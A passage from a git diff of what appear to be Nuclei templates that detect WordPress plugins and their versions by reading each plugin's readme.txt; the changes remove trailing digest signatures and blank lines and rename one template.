490a004630440220106bfe859d72994afbe2e20e3bf4d34906b6a9e732241c2d7b98402519d4d8ce02206bd78279dd1f4a1345d3aa72ce62ed1fbf60d9da5ad1ea68116bf414143b0774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index d31b0e21a7..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210096869ef72e4e8342c365c1f56a562e125a49898055c8ee82a50d3b11d85f08d10221008e7508c9ff3c50d27e7159aed6926939a19bf37cb7b1e2dc06e2d473f8b78b74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 3c1418a122..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/malcare-security/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210081c3150012c167c3441566acba30bfd9f484d5899015f4ac14f2f4a66062a200022100d45a28b6d4380d3229878310b8f1360f55b8846259f01fafb537aa37470bc2d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 158a8368ab..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/megamenu/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220018651f3296114235c1f3affc9871e4234638b98a9f6c4ce12ed69ee0a76bf260220183fa9859058bfe0e99dacc4bdfc9a21c817fdbd486dc890147e1d2e36c4ef8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 8051a34eb0..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/members/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3ebab3cc9b524f931cf50294756f466d272d18180ddce763f7a39549e29547a022100b7a846dfdd0e3c1e753587d4f0522b198286a33127556a4ce3545a20c0386662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 1286cacaa5..540d535ecc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e3e83021ba85c2ab290ed6a76741302ec8e951c47c68ca726dca6e73d57557b202203cae9173eb2710498391f48338debb7167053dd380d561982b295803185693c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 219541eedd..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/metform/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202340d3ceea17cfd82a9c98c01d839731e4cf470ed2feef02eca7483e99ba918202207a6e6c104a98a2708e25963b38667ea01b41c2777db6f7961de4e5d33e2a0707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 1c4b9d93ab..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ml-slider/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022019cc21cf43060c6dee359fe4be4332ae89c2c84fb2997eb8bec617a60d79a06e022072113511edba2b824949e660f0c5f089aed7a8a9140c833c026384e8d456a6e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index b24d40de68..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/newsletter/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e0a7e9b674a45aff5b332424f53d5968f0c99fd80a1fd514b4ffcfcce90215b3022100cfdcec7debe77d1d6ee843254efd9e33ff0e2d560891f1bf12c377d800940eae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 15055faa5f..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/nextend-facebook-connect/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e90dd6f5ca59da74dfaf7ffab05bf80b2a551cab232371b824af8a23f9a4232022100c5b26ddea82600a81d8cc68db28c28624380d5a403b08acc5ac17abf31dc58dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 6244f4db27..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/nextgen-gallery/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fcff2265e50ced04dc4b4e64257a5875394fb25029ff13a3c3982b6b88e2649502204ef149d852cb71a1fcb05fc6b2b8b11b2f84cf2c74f096f10500570a14454e56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3806d20ee7..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c77e74bbbfbd9d13a7dde2aea5651ed9657db9000ebf2192b7d61598e4ac248202205e356b37e5b8f917bc0d4c548b45bb6792e91a675ac601e85e060afdf18941a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 0addf8435b..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202cdb909514ee2a686fb64925bcbcf213f9cca392c718131ef5af9c5f05ed85e8022100b56dd7da0ff353bad1e5f521c89f97b892782f273544c2edf9e8ecdf54fa3ae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 943090f1da..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/official-facebook-pixel/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220363785409ca87c3fc580bfb0dd9ce193ad8d888e8d883fce20bb8203967330ac0220675c0d57b0b52e7212bd9b3cf45125b022e5a5e1dd414d9a9bda86c9729cde49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index a4e0d747a4..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009076a9e9c75fff49800a240ce14ff66c3f918585da9d71c46bc2d6f189c9d084022100f0fbd01562529c1dc297d8060be4842c8cf763dc7fdfea384aaf1e74cb45d0f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index bcea7146d9..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/optinmonster/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e4f1e237d0ecb176c074d4dffc0a744ae88b794f709dd3bb9c4e3de9c2a0576022100ee9f17a24ae07e1d70ad94fceac8d103a5670008d2b577d797a7d4b181b0952e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 14d0e37eec..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/otter-blocks/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088d6b42ec98fcfffa4ea1a3c690d0c2b10b4ec29e54a78086dfd151de945c2b3022100b0a0fc90c9f30162f05b1ac30043a4b8353fcbc438adeeae9fc62d8b65a50e6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index f40b967481..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/password-protected/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100923e22f3adab9b62fb58e6afe846098614b0f0bde9f71941535a3de2497d0065022100f34b5172885bb480db944dcc5363320ff176c7e306d79934a06fddf35b9f628f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 1c65e28081..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pdf-embedder/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb8380e641e18b6450ae1c789c691c6339f918aab0bcf5d684506f53fcf60601022100e84617c797f0df43ce9bd9d09f4acbeb4d50c7455c6e84d1c4217de7a53c42c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 36c9a5859a..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pinterest-for-woocommerce/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022051b54ab3a58c3de52a42e1fa1ac08d6ed146df4a339210701e549b41437aba9d02207536020b20627d7621fa9aa5d0a9fbbf16679b1626c4e03c6094d5d09be9567e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index dbb90090fa..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0bd289b3ec122c620a771e3d34f10e55086c3ecfd42343512a2f74dc4af0a690220319e5e9deec78beae53b9f496c6e88ed6307c08d54854b9d329f93437e3a03ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 563f2d3b82..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/polylang/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210096b62ccab25b7a939bb2090e66c7257e5c501f9da561f9f71a8d182b187ad5230220295254f32a58fb2726e1e5207d7d461efa50412dfccbb5cfdac847c31c3e9438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 59d4d61a61..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100904f3613745949fd411bec0d4feb35a4ff155549439da30ac78f62a54acd3857022100e1816838352813e02edbf1cc2025e8e730f56ccafb67f13b7c31e2c709aea624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index e2381f01ec..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -1,7 +1,7 @@ id: wordpress-post-smtp info: - name: Post SMTP – WP SMTP Plugin with Email Logs & Mobile App for Failure Alerts – Any SMTP Plus Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES, Postmark Detection + name: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more Detection author: ricardomaia severity: info reference: @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe12906c15fbfd2e76f61bcca5b6d1b846299f6c5e943ac9a2a0a46905c658630220061aac020bf045786add67947e1474bf0b9d0d83680132c0ac9d0b21b74837b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index e058e3be90..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/post-types-order/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f9eea75b3d1348625aef5c40d7cf0e0c67ecd93dc7b8fa8e59836814d10cb89022100ad56b283f8493fc95b8716db7c19a7ff03e2c30d731e03cce4f13cb57ffa5b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 28aa5e4da3..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe185b766ff1d37450ed38311c10bc6d1ad1703965706a4846e778daa468753402203f0623426efbac93cd7c54da6c1d03b6f32f2e3b7aeb00a9f32ebd16a6258cdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 888835b2fb..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee3b737a4dca59cb7cfc524660666bc31d40e2cc543c43471ce446066db81ad8022036161c0f5804e9f191403e8acaf89960d0808fef7c8c5d33987bc34f1985677e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 9470a9d9d1..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b58f032a7b12567654ae94dbed2e3b0133400760a936649c11c5482cbeb05360221008380c39ffb7de9c3c91955e2bfd9013de8cde571629ccfe680c8764c07d1b9a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index d6556495ef..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/really-simple-ssl/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f2fe104027eb1e6e0a06d1f225b6538cf86e3b894398feaaacdd5854dc03dfd10221009c111351dbde61399b8938aa240f1e9a26f79dee8c449c67a76cd1bdf9bf9c06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 80e3e0ecfe..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/redirection/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022041e873a814464415828d27d39600502f062b7df49e1fb9c018415aedf63602d00221009d2199e3e2b5b70172fda5d41ae292c2c1490b6899f436dd193e9b7355ba2b3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 185c9576b4..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/redux-framework/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100af438fde20ef5815133165016297bf4359b705c01738b7913293bafe1fd476380220088cd425382f18b1b49381d74f62692f25290b0a09add6f080a7808d7f061ea8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index aca973133c..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/regenerate-thumbnails/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e10378e1f49ec6ed9fb1db563b507518756aa32812e1ae4fe3beb38e0476e8f022100d097efbe7797045eff57e4ec8c9751ada5f485e9cdaa1d70fde0f9458e5c4bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 1ef62b3eef..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/royal-elementor-addons/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022056fb14711010e5c2fc5e92619e7b79bfd111ce60864209b894ff4c53d6f96e8802205d177397c34e5d13fa4ee19653eecb7d0879b5c645d11553681452e2f5ff6b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 1d8ef66f52..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210084a5b1f4bc681ddce0a3ac0da79d438c14a6e6a72bccb2e14ad6fddc584bc4d1022100f507cb656edd8ba7f39504b5c672f8cb897e756bda3fd6759534039010f69e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 0ebae8be19..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009df65f639f621b22181e5539c76822a6c8fb5e206b501862fc482a71bd6bb3e102203676db9040bdf89e9eec76dd65958f69b47fe8898cb81fae7cde7fa89ba4e7e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 3f6279dbe4..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/sg-cachepress/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe8f3b63551736990510de563ad07ced4aaaddd5fc247cbf9247963cc15dc983022054729b557d44f6d912e79bf25f81aefe3de5a0d24d587c662fa01014a2dfae99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index cbab72debc..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/sg-security/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022054bb0fcfb24342b1b38c861c6d13cbcb6aeb691fb6c9daf3cb62140c396e6cee022100bbb0d6c443be6cbfc5c4d1d87069ce0ca82de729d0ca774882acd555fb33ae73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 987960c178..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/shortcodes-ultimate/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220788004cc9abdd3d3d19ee8cc23b615c2023760686be151a2bed1257bd7e9506b022100e6e2de8bff27b2bb64439da5ef5809b5d896819d3a633ec33a9f21b9a7e2062f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index eb5888becf..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/shortpixel-image-optimiser/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022022cf9042b5d0a3659f32a1c383e3407f3d11da7f10d1f953ec5b383fa9d1bff00221008ec0e530e86475ec9dc9a055e2d700c8e4e70d8baf186f12deeccc2f9df3ef2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 17a9b09d47..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/simple-custom-post-order/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 